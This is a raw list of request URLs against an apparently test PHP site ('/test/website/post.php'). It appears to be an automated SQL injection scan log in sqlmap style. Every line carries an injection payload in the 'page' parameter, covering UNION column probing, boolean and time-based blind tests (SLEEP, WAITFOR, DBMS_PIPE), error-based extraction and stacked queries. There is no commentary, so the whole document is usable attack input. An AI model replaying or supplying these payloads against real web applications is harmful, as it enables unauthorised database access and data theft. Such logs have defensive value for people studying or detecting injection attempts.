/test/website/post.php?page=1 UNION ALL SELECT NULL,NULL,NULL,NULL-- UdVG
/test/website/post.php?page=1'))) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tttV
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20iBFj
/test/website/post.php?page=1%60%29%20WHERE%203492%3D3492%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20lDPv
/test/website/post.php?page=-3043" UNION ALL SELECT 2088,2088,2088,2088,2088,2088,2088,2088,2088,2088,2088,2088,2088,2088,2088,2088,2088-- jaRF
/test/website/post.php?page=1 AND 7697=7697# XXXh
/test/website/post.php?page=1%29%20AS%20ZDgG%20WHERE%202159%3D2159%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=-4357%27%29%29%29%20UNION%20ALL%20SELECT%206799%2C6799%2C6799%2C6799--%20QWOl
/test/website/post.php?page=1%25%22%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%22%25%22%3D%22
/test/website/post.php?page=1%20AND%203085%3D3571
/test/website/post.php?page=1%27%29%29%20AS%20lzat%20WHERE%202371%3D2371%20AND%20SLEEP%285%29--%20qtiT
/test/website/post.php?page=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bcgk
/test/website/post.php?page=1%27%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VKWU%29%23
/test/website/post.php?page=-9550') UNION ALL SELECT 9827,9827,9827,9827,9827,9827,9827,9827,9827,9827,9827,9827,9827,9827,9827,9827,9827-- cyEG
/test/website/post.php?page=1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20KIQC
/test/website/post.php?page=1%22%29%29%29%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%20AND%20%28%28%28%22GkGb%22%3D%22GkGb
/test/website/post.php?page=1`) WHERE 1512=1512 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Wywd
/test/website/post.php?page=1)) AS TwGe WHERE 1845=1845 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qGnD
/test/website/post.php?page=1%29%29%20AS%20NFij%20WHERE%209127%3D9127%20AND%205909%3D2197%23
/test/website/post.php?page=1%29%20AS%20iSJW%20WHERE%208738%3D8738%20AND%206419%3D6864%23
/test/website/post.php?page=1)) AS skzU WHERE 1338=1338 UNION ALL SELECT NULL,NULL,NULL,NULL-- YEFy
/test/website/post.php?page=1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hpAn
/test/website/post.php?page=1%25%22%29%29%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%28%28%22%25%22%3D%22
/test/website/post.php?page=1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20ahbD
/test/website/post.php?page=1' IN BOOLEAN MODE) AND 4478=8551-- bWOj
/test/website/post.php?page=-6187) AS xFFJ WHERE 7427=7427 UNION ALL SELECT 7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427,7427-- hUhr
/test/website/post.php?page=1%25%22%20RLIKE%20SLEEP%285%29%20AND%20%22%25%22%3D%22
/test/website/post.php?page=1%')) AND 9200=1643 AND (('%'='
/test/website/post.php?page=1") RLIKE (SELECT (CASE WHEN (6172=6172) THEN 1 ELSE 0x28 END)) AND ("goIL" LIKE "goIL
/test/website/post.php?page=1') RLIKE SLEEP(5) AND ('AVro' LIKE 'AVro
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cKqv
/test/website/post.php?page=1)) AND ROW(6887,7898)>(SELECT COUNT(*),CONCAT(0x71767a6a71,(SELECT (ELT(6887=6887,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM (SELECT 9578 UNION SELECT 4916 UNION SELECT 6664 UNION SELECT 6501)a GROUP BY x) AND ((1462=1462
/test/website/post.php?page=1) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(5882=5882,1))),0x7178787a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- GOpt
/test/website/post.php?page=-5206' IN BOOLEAN MODE) UNION ALL SELECT 7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709,7709-- oZpm
/test/website/post.php?page=1')) AND 1101=1101#
/test/website/post.php?page=1%22%29%29%29%20AND%20ROW%286887%2C7898%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286887%3D6887%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209578%20UNION%20SELECT%204916%20UNION%20SELECT%206664%20UNION%20SELECT%206501%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22oRic%22%20LIKE%20%22oRic
/test/website/post.php?page=1%25%22%29%3BSELECT%20%28CASE%20WHEN%20%283469%3D5197%29%20THEN%203469%20ELSE%203469%2A%28SELECT%203469%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1') AS gAUp WHERE 2132=2132 AND 9467=9467-- nhqK
/test/website/post.php?page=-4359%27%29%20ORDER%20BY%201--%20lGWb
/test/website/post.php?page=1,(SELECT (CASE WHEN (8362=8362) THEN 1 ELSE 8362*(SELECT 8362 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
/test/website/post.php?page=-1795%22%29%20UNION%20ALL%20SELECT%201676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676--%20ZbOC
/test/website/post.php?page=1) AS Qhoh WHERE 8036=8036 AND 8361=9475-- lwWo
/test/website/post.php?page=-9137%20UNION%20ALL%20SELECT%207620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620--%20atIZ
/test/website/post.php?page=1"))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(4317=4317,1))),0x7178787a71,0x78))x)) AND ((("mZSM"="mZSM
/test/website/post.php?page=-6499")) UNION ALL SELECT 3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991-- DjkC
/test/website/post.php?page=1%25%27%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%27%25%27%3D%27
/test/website/post.php?page=-1405%60%29%20WHERE%207375%3D7375%20UNION%20ALL%20SELECT%207375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375--%20qSOR
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20TxNY
/test/website/post.php?page=1" WHERE 5914=5914 AND EXTRACTVALUE(9193,CONCAT(0x5c,0x71767a6a71,(SELECT (ELT(9193=9193,1))),0x7178787a71))-- zoJb
/test/website/post.php?page=ELT(7539=2845,1)
/test/website/post.php?page=-6922" UNION ALL SELECT 5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116,5116-- ynBx
/test/website/post.php?page=-7892")) AS ngTB WHERE 8621=8621 UNION ALL SELECT 8621,8621,8621,8621-- zBTg
/test/website/post.php?page=1')) AS tlgA WHERE 5213=5213 AND 7764=7161-- knAt
/test/website/post.php?page=1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20YWJX
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20FwXA
/test/website/post.php?page=1,EXTRACTVALUE(1959,CONCAT(0x5c,0x71767a6a71,(SELECT (ELT(1959=1959,1))),0x7178787a71))
/test/website/post.php?page=1%25%22%29%20AND%20MAKE_SET%282898%3D2898%2C8166%29%20AND%20%28%22%25%22%3D%22
/test/website/post.php?page=1%25%27%29%29%29%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=1") AS wmgW WHERE 7212=7212;SELECT SLEEP(5)-- hwXu
/test/website/post.php?page=1) AS oQSf WHERE 7045=7045;SELECT SLEEP(5)-- dALd
/test/website/post.php?page=-2244%20UNION%20ALL%20SELECT%208053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053--%20Twhh
/test/website/post.php?page=1%27%29%29%29%20AND%207870%3D7870%20AND%20%28%28%28%27EhaW%27%3D%27EhaW
/test/website/post.php?page=1)) AND ELT(8416=8416,SLEEP(5)) AND ((9404=9404
/test/website/post.php?page=1";SELECT (CASE WHEN (1034=1034) THEN 1034 ELSE 1034*(SELECT 1034 FROM mysql.db) END)#
/test/website/post.php?page=1%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%23%20BIvq
/test/website/post.php?page=1%27%29%29%29%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%20AND%20%28%28%28%27uBrc%27%20LIKE%20%27uBrc
/test/website/post.php?page=1 AND 3738=DBMS_PIPE.RECEIVE_MESSAGE(CHR(78)||CHR(75)||CHR(119)||CHR(75),5)
/test/website/post.php?page=1`) WHERE 9782=9782 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bxDT
/test/website/post.php?page=1%22%29%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286172%3D6172%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%28%28%22SWyw%22%3D%22SWyw
/test/website/post.php?page=1%27%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%27RQWS%27%20LIKE%20%27RQWS
/test/website/post.php?page=1%25%27%29%20AND%20ELT%289333%3D5921%2C5921%29%20AND%20%28%27%25%27%3D%27
/test/website/post.php?page=1%27%29%20AS%20Gryf%20WHERE%207489%3D7489%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20xMqz
/test/website/post.php?page=1%27%29%20AND%203738%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2878%29%7C%7CCHR%2875%29%7C%7CCHR%28119%29%7C%7CCHR%2875%29%2C5%29%20AND%20%28%27JZFp%27%3D%27JZFp
/test/website/post.php?page=1%27%29%29%29%3BSELECT%20SLEEP%285%29%20AND%20%28%28%28%27PIrY%27%20LIKE%20%27PIrY
/test/website/post.php?page=1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VKgT
/test/website/post.php?page=-9723%"))) UNION ALL SELECT 8536,8536,8536,8536,8536,8536,8536,8536,8536,8536,8536,8536-- gsac
/test/website/post.php?page=1%22%29%20AS%20aOlV%20WHERE%208401%3D8401%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20OOtq
/test/website/post.php?page=-9590%29%20UNION%20ALL%20SELECT%204372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372--%20hBzg
/test/website/post.php?page=1' ORDER BY 1839#
/test/website/post.php?page=1';SELECT SLEEP(5)#
/test/website/post.php?page=1)) AND 7697=7697 AND ((8006=8006
/test/website/post.php?page=1 ORDER BY 1-- OvSH
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20TIQJ
/test/website/post.php?page=1' IN BOOLEAN MODE) AND UPDATEXML(9183,CONCAT(0x2e,0x71767a6a71,(SELECT (ELT(9183=9183,1))),0x7178787a71),4408)#
/test/website/post.php?page=1%'));(SELECT * FROM (SELECT(SLEEP(5)))GZlk) AND (('%'='
/test/website/post.php?page=1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20BVrL
/test/website/post.php?page=1%27%29%20AS%20jUNl%20WHERE%209231%3D9231%3BSELECT%20%28CASE%20WHEN%20%287474%3D7474%29%20THEN%207474%20ELSE%207474%2A%28SELECT%207474%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1%22%29%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%28%28%22RCqz%22%20LIKE%20%22RCqz
/test/website/post.php?page=1"))) UNION ALL SELECT NULL,NULL,NULL-- bbyZ
/test/website/post.php?page=1%20AND%20SLEEP%285%29--%20WOMc
/test/website/post.php?page=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%286743%3D6743
/test/website/post.php?page=1%') AND SLEEP(5) AND ('%'='
/test/website/post.php?page=1) WHERE 2313=2313 AND 1919=7799-- kZRs
/test/website/post.php?page=1%27%29%29%20AS%20KpZM%20WHERE%206266%3D6266%3BSELECT%20%28CASE%20WHEN%20%287356%3D5703%29%20THEN%207356%20ELSE%207356%2A%28SELECT%207356%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1'||(SELECT 'svke' FROM DUAL WHERE 5109=5109 AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71767a6a71,(SELECT (ELT(8004=8004,1))),0x7178787a71)) USING utf8))))||'
/test/website/post.php?page=1"))) AND MAKE_SET(6049=7963,7963) AND ((("niDR"="niDR
/test/website/post.php?page=1%27%29%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qVYX%29%20AND%20%28%27hlBf%27%20LIKE%20%27hlBf
/test/website/post.php?page=-7091`) WHERE 4678=4678 UNION ALL SELECT 4678,4678,4678,4678,4678,4678,4678,4678,4678-- DayU
/test/website/post.php?page=-6087"))) UNION ALL SELECT 2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231,2231-- avME
/test/website/post.php?page=1` WHERE 5708=5708 AND 4397=7878-- BCto
/test/website/post.php?page=1%22%20AND%20ELT%288266%3D4330%2C4330%29--%20rEvT
/test/website/post.php?page=1%27%29%29%20AS%20LaJD%20WHERE%201562%3D1562%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20PWWA
/test/website/post.php?page=1%25%22%29%29%20AND%20MAKE_SET%281704%3D2306%2C2306%29%20AND%20%28%28%22%25%22%3D%22
/test/website/post.php?page=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- mlZt
/test/website/post.php?page=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27vZeX%27%3D%27vZeX
/test/website/post.php?page=1%"))) AND 4184=7501-- dyhD
/test/website/post.php?page=-2543%27%20UNION%20ALL%20SELECT%202895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895--%20rDfF
/test/website/post.php?page=-7999%22%29%29%29%20ORDER%20BY%201--%20yRVp
/test/website/post.php?page=-9283"))) UNION ALL SELECT 7275,7275-- cJSC
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20AvAK
/test/website/post.php?page=1%22%29%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29%20AND%20%28%22nBDP%22%3D%22nBDP
/test/website/post.php?page=1%"));SELECT (CASE WHEN (6269=6852) THEN 6269 ELSE 6269*(SELECT 6269 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
/test/website/post.php?page=-8906%'))) UNION ALL SELECT 6813,6813,6813,6813,6813,6813-- WFdd
/test/website/post.php?page=1%22%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qVYX%29%20AND%20%22HaWO%22%3D%22HaWO
/test/website/post.php?page=1%27%20AND%204965%3D1914--%20JxIA
/test/website/post.php?page=1%27%20AND%203952%3D3952%20AND%20%27bQjJ%27%3D%27bQjJ
/test/website/post.php?page=1%22%29%29%20AND%207870%3D7870%20AND%20%28%28%22sLZv%22%3D%22sLZv
/test/website/post.php?page=1 AND 3300=1853#
/test/website/post.php?page=-2911%27%20UNION%20ALL%20SELECT%207986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986--%20VdHp
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20sPeP
/test/website/post.php?page=1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20XcWl
/test/website/post.php?page=1%22%29%29%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%28%28%22eyll%22%20LIKE%20%22eyll
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20LrPH
/test/website/post.php?page=1%27%29%29%20AND%209467%3D9467--%20JCtt
/test/website/post.php?page=1")) AS kEog WHERE 8717=8717;(SELECT * FROM (SELECT(SLEEP(5)))GZlk)-- wbsI
/test/website/post.php?page=1'))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71767a6a71,(SELECT (ELT(4317=4317,1))),0x7178787a71,0x78))x)) AND ((('Dslx' LIKE 'Dslx
/test/website/post.php?page=1%25%27%29%29%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VxDZ%29%20AND%20%28%28%28%27%25%27%3D%27
/test/website/post.php?page=1%29%29%20AS%20UgDV%20WHERE%209283%3D9283%3BSELECT%20%28CASE%20WHEN%20%286298%3D3687%29%20THEN%206298%20ELSE%206298%2A%28SELECT%206298%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1);SELECT SLEEP(5)#
/test/website/post.php?page=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/test/website/post.php?page=1%27%29%29%20AND%208226%3D9808%20AND%20%28%28%27Gfbw%27%3D%27Gfbw
/test/website/post.php?page=1%22%29%29%20AS%20qOKL%20WHERE%208033%3D8033%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%288004%3D8004%2C1%29%29%29%2C0x7178787a71%29%29%20USING%20utf8%29%29%29--%20gFan
/test/website/post.php?page=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qVYX)
/test/website/post.php?page=1%22%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29--%20uaRT
/test/website/post.php?page=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Rzpv
/test/website/post.php?page=1%") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MmmD
/test/website/post.php?page=1%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%283445%3D3588%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%286927%3D6927
/test/website/post.php?page=1`) WHERE 8424=8424 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SZRf
/test/website/post.php?page=-4646%27%29%29%29%20UNION%20ALL%20SELECT%203360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360--%20Tapp
/test/website/post.php?page=-5739) AS BlxY WHERE 6431=6431 UNION ALL SELECT 6431,6431,6431,6431,6431,6431,6431,6431-- LbQo
/test/website/post.php?page=1)) AS YHSD WHERE 7091=7091 AND (SELECT 6282 FROM(SELECT COUNT(*),CONCAT(0x71767a6a71,(SELECT (ELT(6282=6282,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- OhZd
/test/website/post.php?page=-6936%22%29%29%29%20UNION%20ALL%20SELECT%206665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665--%20CbdX
/test/website/post.php?page=1%25%22%29%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%28%22%25%22%3D%22
/test/website/post.php?page=1%20ORDER%20BY%207035%23
/test/website/index.php?username=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&password=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&
/test/website/post.php?page=1%25%22%29%29%29%20AND%208820%3D8820%23
/test/website/post.php?page=1%22%20AND%20SLEEP%285%29%20AND%20%22DNcQ%22%20LIKE%20%22DNcQ
/test/website/post.php?page=1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rKrF
/test/website/post.php?page=1%60%29%20WHERE%203502%3D3502%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%288004%3D8004%2C1%29%29%29%2C0x7178787a71%29%29%20USING%20utf8%29%29%29--%20lYFe
/test/website/post.php?page=1)) AS arNq WHERE 3207=3207 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- KNiT
/test/website/post.php?page=-8216%25%22%29%29%29%20UNION%20ALL%20SELECT%207649%2C7649--%20QYsI
/test/website/post.php?page=-5323%22%29%20UNION%20ALL%20SELECT%208567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567%2C8567--%20cUSe
/test/website/post.php?page=1;SELECT (CASE WHEN (4414=3703) THEN 4414 ELSE 4414*(SELECT 4414 FROM mysql.db) END)#
/test/website/post.php?page=1%27%29%20AS%20gZqF%20WHERE%201619%3D1619%20AND%20SLEEP%285%29%23
/test/website/post.php?page=1'));(SELECT * FROM (SELECT(SLEEP(5)))GZlk) AND (('iXyr'='iXyr
/test/website/post.php?page=1%29%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286172%3D6172%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%28%284258%3D4258
/test/website/post.php?page=1%27%29%29%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%28%28%27oXYK%27%3D%27oXYK
/test/website/post.php?page=1"))) AND SLEEP(5) AND ((("xveu"="xveu
/test/website/post.php?page=1') AND ROW(6887,7898)>(SELECT COUNT(*),CONCAT(0x71767a6a71,(SELECT (ELT(6887=6887,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM (SELECT 9578 UNION SELECT 4916 UNION SELECT 6664 UNION SELECT 6501)a GROUP BY x) AND ('TwjM' LIKE 'TwjM
/test/website/post.php?page=1) AND 6804=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (6804=6804) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(118)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND (9799=9799
/test/website/post.php?page=1" AND (SELECT 6282 FROM(SELECT COUNT(*),CONCAT(0x71767a6a71,(SELECT (ELT(6282=6282,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "rQVT"="rQVT
/test/website/post.php?page=1"));SELECT (CASE WHEN (1034=1034) THEN 1034 ELSE 1034*(SELECT 1034 FROM mysql.db) END)#
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20sQDg
/test/website/post.php?page=-1523%') UNION ALL SELECT 7160,7160,7160,7160,7160,7160,7160,7160,7160,7160-- mcBV
/test/website/post.php?page=1'+(SELECT fvYu WHERE 6768=6768;SELECT (CASE WHEN (7474=7474) THEN 7474 ELSE 7474*(SELECT 7474 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
/test/website/post.php?page=-3360') AS kRoR WHERE 2220=2220 UNION ALL SELECT 2220,2220,2220,2220,2220-- UHuy
/test/website/post.php?page=1%22%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286172%3D6172%29%20THEN%201%20ELSE%200x28%20END%29%29--%20KIfo
/test/website/post.php?page=1) AND 6235=6235 AND (8237=8237
/test/website/post.php?page=1%")) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YVDE
/test/website/post.php?page=1%27%29%29%20AND%201302%3D1302--%20LRhL
/test/website/post.php?page=1%25%27%29%29%29%20AND%209936%3D3963%23
/test/website/post.php?page=1')) AS CSpw WHERE 2207=2207;(SELECT * FROM (SELECT(SLEEP(5)))GZlk)-- yBwD
/test/website/post.php?page=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- LCFt
/test/website/post.php?page=1')) AS Uobp WHERE 2197=2197 RLIKE (SELECT (CASE WHEN (9637=9997) THEN 1 ELSE 0x28 END))-- MMjG
/test/website/post.php?page=1`) WHERE 9435=9435;SELECT (CASE WHEN (7474=7474) THEN 7474 ELSE 7474*(SELECT 7474 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)#
